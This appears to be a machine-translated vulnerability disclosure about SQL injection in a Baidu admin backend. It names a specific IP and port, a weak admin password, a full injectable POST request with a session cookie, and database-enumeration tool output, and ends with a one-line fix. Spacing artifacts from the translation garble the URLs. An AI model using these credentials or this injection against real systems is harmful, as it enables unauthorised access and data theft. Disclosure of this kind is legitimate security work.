A backend of Baidu has SQL Injection involving multiple databases.

A backend of Baidu has SQL Injection involving multiple databases.

Involving multiple databases

Http: // 111.13.112.18: 8080/

A weak password is found in the background in Section C of Baidu.

Account admin password 111111
 

 

 

An injection is found in the background.

POST/index. php? S =/admin/server/loadslavesrv.html & id = 242 HTTP/1.1

Host: 111.13.112.18: 8080

Proxy-Connection: keep-alive

Content-Length: 0

Accept: application/json, text/javascript, */*; q = 0.01

Origin: http: // 111.13.112.18: 8080

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36

Referer: http: // 111.13.112.18: 8080/index. php? S =/admin/index/index.html

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN, zh; q = 0.8

Cookie: PHPSESSID = soi7o2l1bplie1cbki4bbb6bd4; admin_username = admin; userid = 1
 

Web application technology: PHP 5.3.28

Back-end DBMS: MySQL 5.0.11

[17:28:49] [INFO] fetching database names

Available databases [125]:

[*] 0401_ad_x1_x34

[*] Ad_loginfo_x10_x18

[*] Ad_loginfo_x17_x18

[*] Ad_loginfo_x19_x22

[*] Ad_loginfo_x19_x27

[*] Ad_loginfo_xw.x18

[*] Ad_loginfo_xw.x27

[*] Ad_loginfo_xw.x31

[*] Ad_loginfo_xw.x34

[*] Ad_loginfo_x1_x9

[*] Ad_loginfo_x23_x24

[*] Ad_loginfo_x25_x27

[*] Ad_loginfo_x28_x29

[*] Ad_loginfo_x28_x31

[*] Ad_loginfo_x30_x31

[*] Ad_loginfo_x32_k1

[*] Ad_loginfo_x32_x34

[*] Ad_loginfo_x33_x34

[*] Ad_loginfo_x35_x38

[*] Ad_zone_x10_x18

[*] Ad_zone_x12_x14

[*] Ad_zone_x15_x16

[*] Ad_zone_x17_x18

[*] Ad_zone_x18

[*] Ad_zone_x19_x22

[*] Ad_zone_x19_x27

[*] Ad_zone_xw.x18

[*] Ad_zone_x1_x27

[*] Ad_zone_xw.x31

[*] Ad_zone_x0000x34

[*] Ad_zone_x1_x9

[*] Ad_zone_x23_x24

[*] Ad_zone_x24

[*] Ad_zone_x25_x27

[*] Ad_zone_x26

[*] Ad_zone_x27

[*] Ad_zone_x28_x29

[*] Ad_zone_x28_x31

[*] Ad_zone_x29

[*] Ad_zone_x30_x31

[*] Ad_zone_x31

[*] Ad_zone_x32_k1

[*] Ad_zone_x32_x34

[*] Ad_zone_x33_x34

[*] Ad_zone_x34

[*] Ad_zone_x35_x38

[*] Ad_zone_x36

[*] Ad_zone_x37

[*] Ad_zone_x38

[*] Ad_zone_x6_x9

[*] Dk_zone_k1

[*] Information_schema

[*] Ios_loginfo_s1_s4

[*] Ios_loginfo_t4

[*] Ios_loginfo_t5

[*] Ios_loginfo_x1_x23

[*] Ios_loginfo_x1_x46

[*] Ios_loginfo_x24_x37

[*] Ios_loginfo_x24_x40

[*] Ios_loginfo_x24_x46

[*] Ios_loginfo_x38_x40

[*] Ios_loginfo_x41_x46

[*] Ios_loginfo_x46

[*] Ios_loginfo_x47

[*] Ios_loginfo_x47_x49

[*] Ios_loginfo_x47_x53

[*] Ios_loginfo_x47_x61

[*] Ios_loginfo_x47_x63

[*] Ios_loginfo_x50_x53

[*] Ios_loginfo_x54_x55

[*] Ios_loginfo_x54_x58

[*] Ios_loginfo_x56_x57

[*] Ios_loginfo_x59_x61

[*] Ios_loginfo_x62_x63

[*] Ios_zone_s1_s4

[*] Ios_zone_s2_s4

[*] Ios_zone_t2

[*] Ios_zone_t3

[*] Ios_zone_t4

[*] Ios_zone_t6

[*] Ios_zone_x1_x23

[*] Ios_zone_xw.x46

[*] Ios_zone_x24_37

[*] Ios_zone_x24_x40

[*] Ios_zone_x24_x46

[*] Ios_zone_x34_x37

[*] Ios_zone_x38_x40

[*] Ios_zone_x39

[*] Ios_zone_x40

[*] Ios_zone_x41_x46

[*] Ios_zone_x42

[*] Ios_zone_x43

[*] Ios_zone_x44

[*] Ios_zone_x45

[*] Ios_zone_x46

[*] Ios_zone_x47_x49

[*] Ios_zone_x47_x53

[*] Ios_zone_x47_x61

[*] Ios_zone_x47_x63

[*] Ios_zone_x48

[*] Ios_zone_x49

[*] Ios_zone_x50_x53

[*] Ios_zone_x54_x55

[*] Ios_zone_x54_x58

[*] Ios_zone_x56_x57

[*] Ios_zone_x57

[*] Ios_zone_x58

[*] Ios_zone_x59_x61

[*] Ios_zone_x60

[*] Ios_zone_x61

[*] Ios_zone_x62_x63

[*] Ios_zone_x63

[*] Ios_zone_x8_x23

[*] Mergesrv

[*] Mysql

[*] Performance_schema

[*] Restore

[*] Td_loginfo_t1_t10

[*] Td_loginfo_t1_t6

[*] Td_loginfo_t7_t8

[*] Td_loginfo_t9_t10

[*] Td_zone_t1_t10

[*] Td_zone_t1_t6

[*] Td_zone_t7_t8

[*] Td_zone_t9_t10

Solution:

Strict Password Filtering